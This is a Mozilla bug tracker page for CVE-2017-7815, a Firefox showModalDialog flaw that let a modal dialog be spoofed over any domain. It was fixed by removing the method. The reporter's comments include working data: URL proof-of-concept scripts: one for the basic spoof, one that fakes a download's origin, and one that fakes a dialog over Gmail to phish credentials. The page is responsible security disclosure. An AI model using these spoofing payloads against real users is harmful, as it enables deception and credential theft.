Closed Bug 1368981 (CVE-2017-7815) Opened 7 years ago Closed 7 years ago

Firefox allows you to insert modal dialog in any domain

Categories

(Core :: DOM: Core & HTML, defect, P2)

Product:
Core
Component:
DOM: Core & HTML
Type:
defect

Tracking

()

Status:
RESOLVED FIXED
Tracking Flags:
Tracking Status
firefox-esr52 --- wontfix
firefox55 --- wontfix
firefox56 --- fixed
firefox57 --- fixed

People

(Reporter: jm.acuna73, Assigned: mrbkap)

References

Details

(Keywords: sec-moderate, Whiteboard: [adv-main56+][post-critsmash-triage] Fixed by removing ShowModalDialog in bug 981796)

Attachments

(1 file)

Download file from any site
3.39 MB, video/webm
Details 
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36

Steps to reproduce:

1- Go to:

data:text/html,<script>function loadIframe() {win = open('','_top');win.document.open();win.document.write('data:text/html,<s'+'cript>location="https://www.google.com";</s'+'cript>');win.document.close();}function go() {var iframe = '<iframe onload="loadIframe();"></iframe>';document.body.innerHTML = iframe; showModalDialog('https://www.firefox.com','','dialogWidth=600;dialogHeight=600');}</script><input type="button" onclick="go()" value="test"/>

2- Click button

Bug detected in Firefox browsers that do not use multi-process architecture or e10s

Tested in:

Firefox Nightly 55.0a1 (2017-05-17) (64-bit)
Firefox Developer Edition 54.0a2 (2017-04-18) (32-bits)
Firefox 53.0.2 (32-bit)

Note:

I consider that it is not a variant of the bug with id 1365875 because the showModalDialog method is not part of the three types of native popup boxes in javascript
Group: firefox-core-security
Group: firefox-core-security → dom-core-security
Component: Untriaged → DOM
Product: Firefox → Core
Version: 55 Branch → unspecified
You could use the showModalDialog method to download a file from an unauthorized domain.

Example:

data:text/html,<input type="button" onclick="go()" value="test"/><script>
function loadIframe() {
	var win = open('','_top');
	win.document.open();
	win.document.write('data:text/html,<s'+'cript>location = \'https://www.google.com\';</s'+'cript>');
	win.document.close();
}
function go() {
	var iframe = '<iframe style="border:0;height:0;width:0" onload="loadIframe();"></iframe>';
	document.body.innerHTML += iframe;
	window.showModalDialog('http://d.7-zip.org/a/7z1700.exe',window,'dialogWidth=100px;dialogHeight:100px');
}
</script>
And it could even steal the credentials of an unsuspecting user.

Go to:


data:text/html,<input type="button" onclick="go()" value="test"/>
<script>
function loadIframe() {
	var win = open('','_top');
	win.document.open();
	win.document.write('data:text/html,<s'+'cript>location = \'https://mail.google.com\';</s'+'cript>');
	win.document.close();
}
function go() {
	var iframe = '<iframe style="border:0;height:0;width:0" onload="loadIframe();"></iframe>';
	document.body.innerHTML = iframe;
	window.showModalDialog('data:text/html,<h3>Loadig...</h3><input type="button" value="Accept" onclick="window.close()"/>',window,'dialogWidth=100px;dialogHeight:100px');
	location = 'http://feeds.feedburner.com/GoogleInbox';
}
</script>
We're removing showModalDialog with e10s (in bug 981796), right, Blake?
Flags: needinfo?(mrbkap)
(In reply to Andrew Overholt [:overholt] from comment #3)
> We're removing showModalDialog with e10s (in bug 981796), right, Blake?

showModalDialog isn't supported with e10s, and comment 0 says this doesn't affect e10s.

We looked at this in sec triage, and it seemed like a fairly convincing spoof.

    
  
See Also:  → CVE-2017-7791

    
    

    
  
Let's just turn off showModalDialog for everybody. It'll be behind a pref for a bit and we'll remove the code soon after.
Flags: needinfo?(mrbkap)

    
    

    
  
I was thinking we'd eventually get e10s to 100% but comment 6 works for me. I'm assuming we'll just do that in bug 981796.
Priority: -- → P2
Flags: sec-bounty?

    
    

    
  
Hi,

I do not know what exactly means "bug which should be worked on in the next release/iteration"
but I have checked that it is reproduced in:

- Firefox 55.0.3 (32-bit)
- Firefox ESR 52.3.0 (64-bit)

It is not reproduced in:

- Firefox Developer Edition 56.0b3 (32-bits)
- Firefox Nightly 57.0a1 (2017-08-28) (64-bit)


Tested in Firefox browsers that do not use multi-process architecture or e10s.
(I used the html code from Comment 2)

    
    

    
  
This was fixed via bug 981796, which removed showModalDialog.
Assignee: nobody → mrbkap
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago

          status-firefox55:
          --- → wontfix

          status-firefox56:
          --- → fixed

          status-firefox57:
          --- → fixed

          status-firefox-esr52:
          --- → wontfix
Resolution: --- → FIXED

    
    

    
  
I understand now :)
Thank you!
Flags: sec-bounty? → sec-bounty+
Whiteboard: Fixed by removing ShowModalDialog in bug 981796
Group: dom-core-security → core-security-release
Alias: CVE-2017-7815
Whiteboard: Fixed by removing ShowModalDialog in bug 981796 → [adv-main56+] Fixed by removing ShowModalDialog in bug 981796
Flags: qe-verify-
Whiteboard: [adv-main56+] Fixed by removing ShowModalDialog in bug 981796 → [adv-main56+][post-critsmash-triage] Fixed by removing ShowModalDialog in bug 981796
Group: core-security-release
Component: DOM → DOM: Core & HTML

          You need to log in
          before you can comment on or make changes to this bug.
        






  

    
  







  

    

      
Attachment

      

      
      
      
      
    

    

      

        

          

            
General

            

              Creator: 



            

            
Created: 

            
Updated: 

            
Size: